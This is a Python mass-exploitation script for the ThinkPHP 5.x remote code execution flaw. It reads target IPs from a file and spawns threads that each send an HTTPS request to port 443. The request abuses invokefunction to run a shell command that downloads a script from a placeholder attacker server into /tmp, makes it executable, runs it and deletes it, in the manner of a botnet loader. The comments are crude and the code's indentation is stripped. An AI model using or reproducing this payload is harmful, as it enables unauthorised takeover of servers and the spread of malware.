#!/usr/bin/python
# ThinkPHP 5x - Remote Code Execution ( SSL VERSION )
# Scan on port 443 for more results the original version of that exploit / loader is fucking bullshit
# Modified by vbrxmr the your daddy
import threading
import socket
import ssl
import time
import sys
info = open(str(sys.argv[1]),'a+')
class thinkphp(threading.Thread):
def __init__(self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
request = "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp; wget http://YOUR.SERVER.IP/bins/vbrxmr.sh; chmod 777 vbrxmr.sh; sh vbrxmr.sh; rm -rf vbrxmr.sh' HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: chokemedaddy/1.0\r\n\r\n" # payload stage
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((self.ip, 443)) # https port for the socket connection do not change this moron
ssl_sock.sendall(request.encode('utf-8')) # some encoding
ssl_sock.close()
except Exception as e:
print(e)
return
for ip in info:
try:
time.sleep(0.01)
thinkphp(ip).start()
except:
pass
